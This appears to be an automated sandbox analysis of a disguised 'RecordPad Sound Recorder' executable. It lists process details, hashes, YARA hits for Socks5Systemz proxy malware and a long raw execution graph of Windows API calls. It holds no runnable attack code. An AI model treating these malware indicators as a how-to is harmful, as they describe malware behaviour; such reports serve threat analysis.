                                                                                    MD5 hash:8EF7001015E126E74BC41268504CA1E2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 3%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:13:41:55
                                                                                    Start date:11/06/2024
                                                                                    Path:C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -i
                                                                                    Imagebase:0x400000
                                                                                    File size:2'963'553 bytes
                                                                                    MD5 hash:1F7ED6F21708581170C4BF77C64A9D32
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.2033651879.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 42%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:13:41:56
                                                                                    Start date:11/06/2024
                                                                                    Path:C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -s
                                                                                    Imagebase:0x400000
                                                                                    File size:2'963'553 bytes
                                                                                    MD5 hash:1F7ED6F21708581170C4BF77C64A9D32
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.2036104577.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000004.00000002.3269669582.000000000097E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:13:42:40
                                                                                    Start date:11/06/2024
                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                    Imagebase:0x7ff7e52b0000
                                                                                    File size:55'320 bytes
                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:21.2%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:2.3%
                                                                                      Total number of Nodes:1514
                                                                                      Total number of Limit Nodes:21
                                                                                      execution_graph 5092 409d41 5129 409984 5092->5129 5094 409d46 5136 402f24 5094->5136 5096 409d4b 5097 4096e8 15 API calls 5096->5097 5101 409d50 5097->5101 5098 409da3 5099 4026c4 GetSystemTime 5098->5099 5100 409da8 5099->5100 5102 409254 32 API calls 5100->5102 5101->5098 5104 408cfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5101->5104 5103 409db0 5102->5103 5105 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5103->5105 5106 409d7f 5104->5106 5107 409dbd 5105->5107 5109 409d87 MessageBoxA 5106->5109 5108 406888 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 5107->5108 5111 409dca 5108->5111 5109->5098 5110 409d94 5109->5110 5112 4057b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5110->5112 5113 406620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 5111->5113 5112->5098 5114 409dda 5113->5114 5115 406598 LocalAlloc TlsSetValue TlsGetValue TlsGetValue CharPrevA 5114->5115 5116 409deb 5115->5116 5117 403340 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5116->5117 5118 409df9 5117->5118 5119 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5118->5119 5120 409e09 5119->5120 5121 407440 23 API calls 5120->5121 5122 409e48 5121->5122 5123 402594 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5122->5123 5124 409e68 5123->5124 5125 40794c LocalAlloc TlsSetValue TlsGetValue TlsGetValue InterlockedExchange 5124->5125 5126 409eaa 5125->5126 5127 407bdc 23 API calls 5126->5127 5128 409ed1 5127->5128 5130 4099a5 5129->5130 5131 40998d 5129->5131 5132 4057e0 4 API calls 5130->5132 5141 4057e0 5131->5141 5134 4099b6 5132->5134 5134->5094 5135 40999f 5135->5094 5137 403154 4 API calls 5136->5137 5138 402f29 5137->5138 5178 402bcc 5138->5178 5140 402f51 5140->5140 5142 4057e7 5141->5142 5145 4031e8 5142->5145 5146 4031ec 5145->5146 5147 4031fc 5145->5147 5146->5147 5151 403254 5146->5151 5148 403228 5147->5148 5156 4025ac 5147->5156 5148->5135 5152 403274 5151->5152 5153 403258 5151->5153 5152->5147 5160 402594 5153->5160 5157 4025b0 5156->5157 5158 4025ba 5156->5158 5157->5158 5159 403154 4 API calls 5157->5159 5158->5148 5158->5158 5159->5158 5161 4025a2 5160->5161 5163 402598 5160->5163 5161->5147 5162 402632 5162->5162 5163->5161 5163->5162 5165 403154 5163->5165 5166 403164 5165->5166 5167 40318c TlsGetValue 5165->5167 5166->5162 5168 403196 5167->5168 5169 40316f 5167->5169 5168->5162 5173 40310c 5169->5173 5171 403174 TlsGetValue 5172 403184 5171->5172 5172->5162 5174 403120 LocalAlloc 5173->5174 5175 403116 5173->5175 5176 403132 5174->5176 5177 40313e TlsSetValue 5174->5177 5175->5174 5176->5171 5177->5176 5179 402bd5 RaiseException 5178->5179 5180 402be6 5178->5180 5179->5180 5180->5140 6179 408f42 6180 408f34 6179->6180 6181 408ed0 Wow64RevertWow64FsRedirection 6180->6181 6182 408f3c 6181->6182 6183 408f44 SetLastError 6184 408f4d 6183->6184 6185 402b48 RaiseException 6192 40294a 6195 402952 6192->6195 6193 403554 4 API calls 6193->6195 6194 402967 6195->6193 6195->6194 6196 403f4a 6197 403f53 6196->6197 6198 403f5c 6196->6198 6200 403f07 6197->6200 6203 403f09 6200->6203 6202 403f3c 6202->6198 6205 403e9c 6203->6205 6206 403154 4 API calls 6203->6206 6210 403f3d 6203->6210 6223 403e9c 6203->6223 6204 403ef2 6208 402674 4 API calls 6204->6208 6205->6202 6205->6204 6212 403ea9 6205->6212 6214 403e8e 6205->6214 6206->6203 6211 403ecf 6208->6211 6210->6198 6211->6198 6212->6211 6213 402674 4 API calls 6212->6213 6213->6211 6215 403e4c 6214->6215 6216 403e62 6215->6216 6217 403e7b 6215->6217 6219 403e67 6215->6219 6218 403cc8 4 API calls 6216->6218 6220 402674 4 API calls 6217->6220 6218->6219 6221 403e78 6219->6221 6222 402674 4 API calls 6219->6222 6220->6221 6221->6204 6221->6212 6222->6221 6224 403ed7 6223->6224 6230 403ea9 6223->6230 6225 403ef2 6224->6225 6226 403e8e 4 API calls 6224->6226 6227 402674 4 API calls 6225->6227 6228 403ee6 6226->6228 6229 403ecf 6227->6229 6228->6225 6228->6230 6229->6203 6230->6229 6231 402674 4 API calls 6230->6231 6231->6229 5881 403a52 5882 403a74 5881->5882 5883 403a5a WriteFile 5881->5883 5883->5882 5884 403a78 GetLastError 5883->5884 5884->5882 5885 402654 5886 403154 4 API calls 5885->5886 5887 402614 5886->5887 5888 403154 4 API calls 5887->5888 5889 402632 5887->5889 5888->5889 5890 408e54 5893 408d20 5890->5893 5894 408d29 5893->5894 5895 403198 4 API calls 5894->5895 5896 408d37 5894->5896 5895->5894 6236 40755a GetFileSize 6237 407586 6236->6237 6238 407576 GetLastError 6236->6238 6238->6237 6239 40757f 6238->6239 6240 4073ec 21 API calls 6239->6240 6240->6237 6241 406f5b 6242 406f68 SetErrorMode 6241->6242 6247 40a161 6248 40a0d3 6247->6248 6249 40a0ff 6248->6249 6250 4093fc 9 API calls 6248->6250 6251 40a118 6249->6251 6254 40a112 RemoveDirectoryA 6249->6254 6250->6249 6252 40a121 73A15CF0 6251->6252 6253 40a12c 6251->6253 6252->6253 6255 40a154 6253->6255 6256 40357c 4 API calls 6253->6256 6254->6251 6257 40a14a 6256->6257 6258 4025ac 4 API calls 6257->6258 6258->6255 5901 402e64 5902 402e69 5901->5902 5903 402e7a RtlUnwind 5902->5903 5904 402e5e 5902->5904 5905 402e9d 5903->5905 6263 40a168 6264 40a16f 6263->6264 6266 40a19a 6263->6266 6273 40936c 6264->6273 6268 403198 4 API calls 6266->6268 6267 40a174 6267->6266 6271 40a192 MessageBoxA 6267->6271 6269 40a1d2 6268->6269 6270 403198 4 API calls 6269->6270 6272 40a1da 6270->6272 6271->6266 6274 4093d3 ExitWindowsEx 6273->6274 6275 409378 GetCurrentProcess OpenProcessToken 6273->6275 6276 40938a 6274->6276 6275->6276 6277 40938e LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6275->6277 6276->6267 6277->6274 6277->6276 5673 406f77 5674 406f68 SetErrorMode 5673->5674 6290 403f7d 6292 403fa2 6290->6292 6294 403f84 6290->6294 6291 403f8c 6293 403e8e 4 API calls 6292->6293 6292->6294 6293->6294 6294->6291 6295 402674 4 API calls 6294->6295 6296 403fca 6295->6296 6297 403d02 6304 403d12 6297->6304 6298 403ddf ExitProcess 6299 403db8 6301 403cc8 4 API calls 6299->6301 6300 403dea 6302 403dc2 6301->6302 6303 403cc8 4 API calls 6302->6303 6305 403dcc 6303->6305 6304->6298 6304->6299 6304->6300 6306 403da4 6304->6306 6307 403d8f MessageBoxA 6304->6307 6317 4019dc 6305->6317 6313 403fe4 6306->6313 6307->6299 6310 403dd1 6310->6298 6310->6300 6314 403fe8 6313->6314 6315 403f07 4 API calls 6314->6315 6316 404006 6315->6316 6318 401abb 6317->6318 6319 4019ed 6317->6319 6318->6310 6320 401a04 RtlEnterCriticalSection 6319->6320 6321 401a0e LocalFree 6319->6321 6320->6321 6322 401a41 6321->6322 6323 401a2f VirtualFree 6322->6323 6324 401a49 6322->6324 6323->6322 6325 401a70 LocalFree 6324->6325 6326 401a87 6324->6326 6325->6325 6325->6326 6327 401aa9 RtlDeleteCriticalSection 6326->6327 6328 401a9f RtlLeaveCriticalSection 6326->6328 6327->6310 6328->6327 5914 404206 5915 4041cc 5914->5915 5916 40420a 5914->5916 5917 404282 5916->5917 5918 403154 4 API calls 5916->5918 5919 404323 5918->5919 5920 402c08 5921 402c82 5920->5921 5924 402c19 5920->5924 5922 402c56 RtlUnwind 5923 403154 4 API calls 5922->5923 5923->5921 5924->5921 5924->5922 5927 402b28 5924->5927 5928 402b31 RaiseException 5927->5928 5929 402b47 5927->5929 5928->5929 5929->5922 6339 409f0b 6340 409984 4 API calls 6339->6340 6341 409f10 6340->6341 6342 409f15 6341->6342 6343 402f24 5 API calls 6341->6343 6344 407878 InterlockedExchange 6342->6344 6343->6342 6345 409f3f 6344->6345 6346 409f4f 6345->6346 6347 409984 4 API calls 6345->6347 6348 40760c 22 API calls 6346->6348 6347->6346 6349 409f6b 6348->6349 6350 4025ac 4 API calls 6349->6350 6351 409fa2 6350->6351 5861 40760c SetEndOfFile 5862 407623 5861->5862 5863 40761c 5861->5863 5864 4073ec 21 API calls 5863->5864 5864->5862 5930 403018 5931 403025 5930->5931 5935 403070 5930->5935 5932 40302a RtlUnwind 5931->5932 5933 40304e 5932->5933 5936 402f78 5933->5936 5937 402be8 5933->5937 5938 402bf1 RaiseException 5937->5938 5939 402c04 5937->5939 5938->5939 5939->5935 5944 407c23 5947 407c29 5944->5947 5945 40322c 4 API calls 5946 407cc1 5945->5946 5948 4032fc 4 API calls 5946->5948 5947->5945 5949 407ccb 5948->5949 5950 4057e0 4 API calls 5949->5950 5951 407cda 5950->5951 5952 403198 4 API calls 5951->5952 5953 407cf4 5952->5953 5181 407524 SetFilePointer 5182 407557 5181->5182 5183 407547 GetLastError 5181->5183 5183->5182 5184 407550 5183->5184 5186 4073ec GetLastError 5184->5186 5189 40734c 5186->5189 5198 4071e4 FormatMessageA 5189->5198 5192 407394 5194 4057e0 4 API calls 5192->5194 5195 4073a3 5194->5195 5205 403198 5195->5205 5199 40720a 5198->5199 5209 403278 5199->5209 5202 4050e4 5214 4050f8 5202->5214 5206 4031b7 5205->5206 5207 40319e 5205->5207 5206->5182 5207->5206 5208 4025ac 4 API calls 5207->5208 5208->5206 5210 403254 4 API calls 5209->5210 5211 403288 5210->5211 5212 403198 4 API calls 5211->5212 5213 4032a0 5212->5213 5213->5192 5213->5202 5215 405115 5214->5215 5222 404da8 5215->5222 5218 405141 5220 403278 4 API calls 5218->5220 5221 4050f3 5220->5221 5221->5192 5226 404dc3 5222->5226 5223 404dd5 5223->5218 5227 404b34 5223->5227 5226->5223 5230 404eca 5226->5230 5237 404d9c 5226->5237 5328 405890 5227->5328 5229 404b45 5229->5218 5231 404edb 5230->5231 5234 404f29 5230->5234 5233 404faf 5231->5233 5231->5234 5236 404f47 5233->5236 5244 404d88 5233->5244 5234->5236 5240 404d44 5234->5240 5236->5226 5236->5236 5238 403198 4 API calls 5237->5238 5239 404da6 5238->5239 5239->5226 5241 404d52 5240->5241 5247 404b4c 5241->5247 5243 404d80 5243->5234 5267 4039a4 5244->5267 5250 405900 5247->5250 5249 404b65 5249->5243 5251 40590e 5250->5251 5260 404c2c LoadStringA 5251->5260 5254 4050e4 19 API calls 5255 405946 5254->5255 5256 4031e8 4 API calls 5255->5256 5257 405951 5256->5257 5263 4031b8 5257->5263 5261 403278 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5260->5261 5262 404c59 5261->5262 5262->5254 5264 4031be 5263->5264 5265 4031e3 5264->5265 5266 4025ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5264->5266 5265->5249 5266->5264 5268 4039ab 5267->5268 5273 4038b4 5268->5273 5270 4039cb 5271 403198 4 API calls 5270->5271 5272 4039d2 5271->5272 5272->5236 5274 4038d5 5273->5274 5275 4038c8 5273->5275 5277 403934 5274->5277 5278 4038db 5274->5278 5301 403780 5275->5301 5279 403993 5277->5279 5280 40393b 5277->5280 5282 4038e1 5278->5282 5283 4038ee 5278->5283 5284 4037f4 3 API calls 5279->5284 5285 403941 5280->5285 5286 40394b 5280->5286 5281 4038d0 5281->5270 5308 403894 5282->5308 5288 403894 6 API calls 5283->5288 5284->5281 5323 403864 5285->5323 5290 4037f4 3 API calls 5286->5290 5291 4038fc 5288->5291 5292 40395d 5290->5292 5313 4037f4 5291->5313 5295 403864 9 API calls 5292->5295 5294 403917 5319 40374c 5294->5319 5296 403976 5295->5296 5299 40374c VariantClear 5296->5299 5298 40392c 5298->5270 5300 40398b 5299->5300 5300->5270 5302 4037f0 5301->5302 5303 403744 5301->5303 5302->5281 5303->5301 5304 403793 VariantClear 5303->5304 5305 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5303->5305 5306 4037dc VariantCopyInd 5303->5306 5307 4037ab 5303->5307 5304->5303 5305->5303 5306->5302 5306->5303 5307->5281 5309 4036b8 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5308->5309 5310 4038a0 5309->5310 5311 40374c VariantClear 5310->5311 5312 4038a9 5311->5312 5312->5281 5314 403845 VariantChangeTypeEx 5313->5314 5315 40380a VariantChangeTypeEx 5313->5315 5316 403832 5314->5316 5317 403826 5315->5317 5316->5294 5318 40374c VariantClear 5317->5318 5318->5316 5320 403766 5319->5320 5321 403759 5319->5321 5320->5298 5321->5320 5322 403779 VariantClear 5321->5322 5322->5298 5324 40369c 8 API calls 5323->5324 5325 40387b 5324->5325 5326 40374c VariantClear 5325->5326 5327 403882 5326->5327 5327->5281 5329 40589c 5328->5329 5330 404c2c 5 API calls 5329->5330 5331 4058c2 5330->5331 5332 4031e8 4 API calls 5331->5332 5333 4058cd 5332->5333 5334 403198 4 API calls 5333->5334 5335 4058e2 5334->5335 5335->5229 5336 409b24 5375 4030dc 5336->5375 5338 409b3a 5378 4042e8 5338->5378 5340 409b3f 5381 406518 5340->5381 5344 409b49 5391 408fc8 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5344->5391 5353 4031e8 4 API calls 5354 409b95 5353->5354 5427 407440 5354->5427 5360 409984 4 API calls 5361 409c22 5360->5361 5447 407400 5361->5447 5363 409be4 5363->5360 5363->5361 5364 409c63 5451 40794c 5364->5451 5365 409c48 5365->5364 5366 409984 4 API calls 5365->5366 5366->5364 5368 409c88 5461 408a2c 5368->5461 5372 409cce 5373 408a2c 23 API calls 5372->5373 5374 409d07 5372->5374 5373->5372 5483 403094 5375->5483 5377 4030e1 GetModuleHandleA GetCommandLineA 5377->5338 5379 403154 4 API calls 5378->5379 5380 404323 5378->5380 5379->5380 5380->5340 5484 405bf8 5381->5484 5390 406564 6F571CD0 5390->5344 5392 40901b 5391->5392 5574 406f00 SetErrorMode 5392->5574 5395 4071e4 5 API calls 5396 40904b 5395->5396 5397 403198 4 API calls 5396->5397 5398 409060 5397->5398 5399 409a14 GetSystemInfo VirtualQuery 5398->5399 5400 409ac8 5399->5400 5403 409a3e 5399->5403 5405 409580 5400->5405 5401 409aa9 VirtualQuery 5401->5400 5401->5403 5402 409a68 VirtualProtect 5402->5403 5403->5400 5403->5401 5403->5402 5404 409a97 VirtualProtect 5403->5404 5404->5401 5580 406b30 GetCommandLineA 5405->5580 5407 40963d 5409 4031b8 4 API calls 5407->5409 5408 406b8c 6 API calls 5412 40959d 5408->5412 5410 409657 5409->5410 5413 406b8c 5410->5413 5411 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5411->5412 5412->5407 5412->5408 5412->5411 5414 406bb3 GetModuleFileNameA 5413->5414 5415 406bd7 GetCommandLineA 5413->5415 5416 403278 4 API calls 5414->5416 5423 406bdc 5415->5423 5417 406bd5 5416->5417 5421 406c04 5417->5421 5418 406be1 5419 403198 4 API calls 5418->5419 5422 406be9 5419->5422 5420 406a50 4 API calls 5420->5423 5424 403198 4 API calls 5421->5424 5425 40322c 4 API calls 5422->5425 5423->5418 5423->5420 5423->5422 5426 406c19 5424->5426 5425->5421 5426->5353 5428 40744a 5427->5428 5601 4074d6 5428->5601 5604 4074d8 5428->5604 5429 407476 5430 40748a 5429->5430 5431 4073ec 21 API calls 5429->5431 5434 409ad0 FindResourceA 5430->5434 5431->5430 5435 409ae5 5434->5435 5436 409aea SizeofResource 5434->5436 5439 409984 4 API calls 5435->5439 5437 409af7 5436->5437 5438 409afc LoadResource 5436->5438 5440 409984 4 API calls 5437->5440 5441 409b0a 5438->5441 5442 409b0f LockResource 5438->5442 5439->5436 5440->5438 5443 409984 4 API calls 5441->5443 5444 409b20 5442->5444 5445 409b1b 5442->5445 5443->5442 5444->5363 5477 407878 5444->5477 5446 409984 4 API calls 5445->5446 5446->5444 5448 407414 5447->5448 5449 407424 5448->5449 5450 40734c 20 API calls 5448->5450 5449->5365 5450->5449 5452 407959 5451->5452 5453 4057e0 4 API calls 5452->5453 5454 4079ad 5452->5454 5453->5454 5455 407878 InterlockedExchange 5454->5455 5456 4079bf 5455->5456 5457 4057e0 4 API calls 5456->5457 5458 4079d5 5456->5458 5457->5458 5459 407a18 5458->5459 5460 4057e0 4 API calls 5458->5460 5459->5368 5460->5459 5463 408a5d 5461->5463 5468 408aa6 5461->5468 5462 408af1 5616 407bdc 5462->5616 5463->5468 5471 403420 4 API calls 5463->5471 5472 4031e8 4 API calls 5463->5472 5476 407bdc 23 API calls 5463->5476 5607 4034f0 5463->5607 5465 407bdc 23 API calls 5465->5468 5467 408b08 5470 4031b8 4 API calls 5467->5470 5468->5462 5468->5465 5469 4034f0 4 API calls 5468->5469 5474 403420 4 API calls 5468->5474 5475 4031e8 4 API calls 5468->5475 5469->5468 5473 408b22 5470->5473 5471->5463 5472->5463 5480 404b70 5473->5480 5474->5468 5475->5468 5476->5463 5669 407824 5477->5669 5481 402594 4 API calls 5480->5481 5482 404b7b 5481->5482 5482->5372 5483->5377 5485 405890 5 API calls 5484->5485 5486 405c09 5485->5486 5487 4051d0 GetSystemDefaultLCID 5486->5487 5491 405206 5487->5491 5488 404c2c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5488->5491 5489 40515c LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5489->5491 5490 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5490->5491 5491->5488 5491->5489 5491->5490 5495 405268 5491->5495 5492 404c2c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5492->5495 5493 40515c LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5493->5495 5494 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5494->5495 5495->5492 5495->5493 5495->5494 5496 4052eb 5495->5496 5497 4031b8 4 API calls 5496->5497 5498 405305 5497->5498 5499 405314 GetSystemDefaultLCID 5498->5499 5556 40515c GetLocaleInfoA 5499->5556 5502 4031e8 4 API calls 5503 405354 5502->5503 5504 40515c 5 API calls 5503->5504 5505 405369 5504->5505 5506 40515c 5 API calls 5505->5506 5507 40538d 5506->5507 5562 4051a8 GetLocaleInfoA 5507->5562 5510 4051a8 GetLocaleInfoA 5511 4053bd 5510->5511 5512 40515c 5 API calls 5511->5512 5513 4053d7 5512->5513 5514 4051a8 GetLocaleInfoA 5513->5514 5515 4053f4 5514->5515 5516 40515c 5 API calls 5515->5516 5517 40540e 5516->5517 5518 4031e8 4 API calls 5517->5518 5519 40541b 5518->5519 5520 40515c 5 API calls 5519->5520 5521 405430 5520->5521 5522 4031e8 4 API calls 5521->5522 5523 40543d 5522->5523 5524 4051a8 GetLocaleInfoA 5523->5524 5525 40544b 5524->5525 5526 40515c 5 API calls 5525->5526 5527 405465 5526->5527 5528 4031e8 4 API calls 5527->5528 5529 405472 5528->5529 5530 40515c 5 API calls 5529->5530 5531 405487 5530->5531 5532 4031e8 4 API calls 5531->5532 5533 405494 5532->5533 5534 40515c 5 API calls 5533->5534 5535 4054a9 5534->5535 5536 4054c6 5535->5536 5537 4054b7 5535->5537 5539 40322c 4 API calls 5536->5539 5570 40322c 5537->5570 5540 4054c4 5539->5540 5541 40515c 5 API calls 5540->5541 5542 4054e8 5541->5542 5543 405505 5542->5543 5544 4054f6 5542->5544 5546 403198 4 API calls 5543->5546 5545 40322c 4 API calls 5544->5545 5547 405503 5545->5547 5546->5547 5564 4033b4 5547->5564 5549 405527 5550 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5549->5550 5551 405541 5550->5551 5552 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5551->5552 5553 40555b 5552->5553 5554 405c44 GetVersionExA 5553->5554 5555 405c5b 5554->5555 5555->5390 5557 405183 5556->5557 5558 405195 5556->5558 5559 403278 4 API calls 5557->5559 5560 40322c 4 API calls 5558->5560 5561 405193 5559->5561 5560->5561 5561->5502 5563 4051c4 5562->5563 5563->5510 5565 4033bc 5564->5565 5566 403254 4 API calls 5565->5566 5567 4033cf 5566->5567 5568 4031e8 4 API calls 5567->5568 5569 4033f7 5568->5569 5572 403230 5570->5572 5571 403252 5571->5540 5572->5571 5573 4025ac 4 API calls 5572->5573 5573->5571 5578 403414 5574->5578 5577 406f4e 5577->5395 5579 403418 LoadLibraryA 5578->5579 5579->5577 5587 406a50 5580->5587 5582 406b53 5583 406b65 5582->5583 5584 406a50 4 API calls 5582->5584 5585 403198 4 API calls 5583->5585 5584->5582 5586 406b7a 5585->5586 5586->5412 5588 406a7c 5587->5588 5589 403278 4 API calls 5588->5589 5590 406a89 5589->5590 5597 403420 5590->5597 5592 406a91 5593 4031e8 4 API calls 5592->5593 5594 406aa9 5593->5594 5595 403198 4 API calls 5594->5595 5596 406acb 5595->5596 5596->5582 5598 403426 5597->5598 5600 403437 5597->5600 5599 403254 4 API calls 5598->5599 5598->5600 5599->5600 5600->5592 5602 4074d8 5601->5602 5603 407517 CreateFileA 5602->5603 5603->5429 5605 403414 5604->5605 5606 407517 CreateFileA 5605->5606 5606->5429 5608 4034fd 5607->5608 5615 40352d 5607->5615 5610 403526 5608->5610 5612 403509 5608->5612 5609 403198 4 API calls 5611 403517 5609->5611 5613 403254 4 API calls 5610->5613 5611->5463 5624 4025c4 5612->5624 5613->5615 5615->5609 5617 407bf7 5616->5617 5618 407bec 5616->5618 5639 407b80 5617->5639 5628 407dfc 5618->5628 5621 4057e0 4 API calls 5622 407bf5 5621->5622 5622->5467 5626 4025ca 5624->5626 5625 4025dc 5625->5611 5626->5625 5627 403154 4 API calls 5626->5627 5627->5625 5629 407e11 5628->5629 5630 407e20 5629->5630 5646 407d14 5629->5646 5632 407e5a 5630->5632 5633 407d14 19 API calls 5630->5633 5634 407e6e 5632->5634 5635 407d14 19 API calls 5632->5635 5633->5632 5638 407e9a 5634->5638 5643 407da4 5634->5643 5635->5634 5638->5622 5640 407bd3 5639->5640 5641 407b94 5639->5641 5640->5621 5640->5622 5641->5640 5657 407ad0 5641->5657 5644 407db3 VirtualFree 5643->5644 5645 407dc5 VirtualAlloc 5643->5645 5644->5645 5645->5638 5649 405814 5646->5649 5648 407d36 5648->5630 5650 405820 5649->5650 5651 4050e4 19 API calls 5650->5651 5652 40584d 5651->5652 5653 4031e8 4 API calls 5652->5653 5654 405858 5653->5654 5655 403198 4 API calls 5654->5655 5656 40586d 5655->5656 5656->5648 5658 407adb 5657->5658 5662 407aec 5657->5662 5660 4057e0 4 API calls 5658->5660 5659 407400 20 API calls 5661 407b00 5659->5661 5660->5662 5663 407400 20 API calls 5661->5663 5662->5659 5664 407b21 5663->5664 5665 407878 InterlockedExchange 5664->5665 5666 407b36 5665->5666 5667 407b4c 5666->5667 5668 4057e0 4 API calls 5666->5668 5667->5641 5668->5667 5670 407836 5669->5670 5671 407847 5669->5671 5672 40783b InterlockedExchange 5670->5672 5671->5363 5672->5671 5954 405a24 5955 405a2c 5954->5955 5957 405a34 5954->5957 5956 405a3b 5955->5956 5958 405a32 5955->5958 5959 405890 5 API calls 5956->5959 5961 40599c 5958->5961 5959->5957 5962 4059a4 5961->5962 5963 4059be 5962->5963 5964 403154 4 API calls 5962->5964 5965 4059c3 5963->5965 5966 4059da 5963->5966 5964->5962 5967 405890 5 API calls 5965->5967 5968 403154 4 API calls 5966->5968 5970 4059d6 5967->5970 5969 4059df 5968->5969 5971 405900 19 API calls 5969->5971 5972 403154 4 API calls 5970->5972 5971->5970 5973 405a08 5972->5973 5974 403154 4 API calls 5973->5974 5975 405a16 5974->5975 5975->5957 6360 409d26 6361 409d4b 6360->6361 6412 4096e8 6361->6412 6363 409da3 6440 4026c4 GetSystemTime 6363->6440 6365 409da8 6394 409254 6365->6394 6366 409d50 6366->6363 6433 408cfc 6366->6433 6370 4031e8 4 API calls 6372 409dbd 6370->6372 6371 409d7f 6374 409d87 MessageBoxA 6371->6374 6441 406888 6372->6441 6374->6363 6375 409d94 6374->6375 6436 4057b4 6375->6436 6381 409deb 6468 403340 6381->6468 6383 409df9 6384 4031e8 4 API calls 6383->6384 6385 409e09 6384->6385 6386 407440 23 API calls 6385->6386 6387 409e48 6386->6387 6388 402594 4 API calls 6387->6388 6389 409e68 6388->6389 6390 40794c 5 API calls 6389->6390 6391 409eaa 6390->6391 6392 407bdc 23 API calls 6391->6392 6393 409ed1 6392->6393 6406 409274 6394->6406 6397 409299 CreateDirectoryA 6398 409311 6397->6398 6399 4092a3 GetLastError 6397->6399 6400 40322c 4 API calls 6398->6400 6399->6406 6401 40931b 6400->6401 6403 4031b8 4 API calls 6401->6403 6402 408cfc 4 API calls 6402->6406 6405 409335 6403->6405 6404 404be4 19 API calls 6404->6406 6407 4031b8 4 API calls 6405->6407 6406->6397 6406->6402 6406->6404 6408 4071e4 5 API calls 6406->6408 6410 408ccc 4 API calls 6406->6410 6411 4057e0 4 API calls 6406->6411 6483 406c54 6406->6483 6506 409148 6406->6506 6409 409342 6407->6409 6408->6406 6409->6370 6410->6406 6411->6406 6413 409731 6412->6413 6419 4096f5 6412->6419 6414 40973a 6413->6414 6415 40973e 6413->6415 6416 409747 GetUserDefaultLangID 6414->6416 6425 40973c 6414->6425 6612 406f84 GetModuleHandleA GetProcAddress 6415->6612 6416->6425 6419->6413 6422 409721 6419->6422 6420 4097ef 6421 40969c 5 API calls 6420->6421 6423 409728 6421->6423 6424 40969c 5 API calls 6422->6424 6423->6366 6424->6423 6425->6420 6426 40979e 6425->6426 6427 409791 6425->6427 6428 409787 GetACP 6425->6428 6426->6420 6429 4097e2 6426->6429 6430 4097d8 GetACP 6426->6430 6431 40969c 5 API calls 6427->6431 6428->6425 6428->6427 6432 40969c 5 API calls 6429->6432 6430->6426 6430->6429 6431->6423 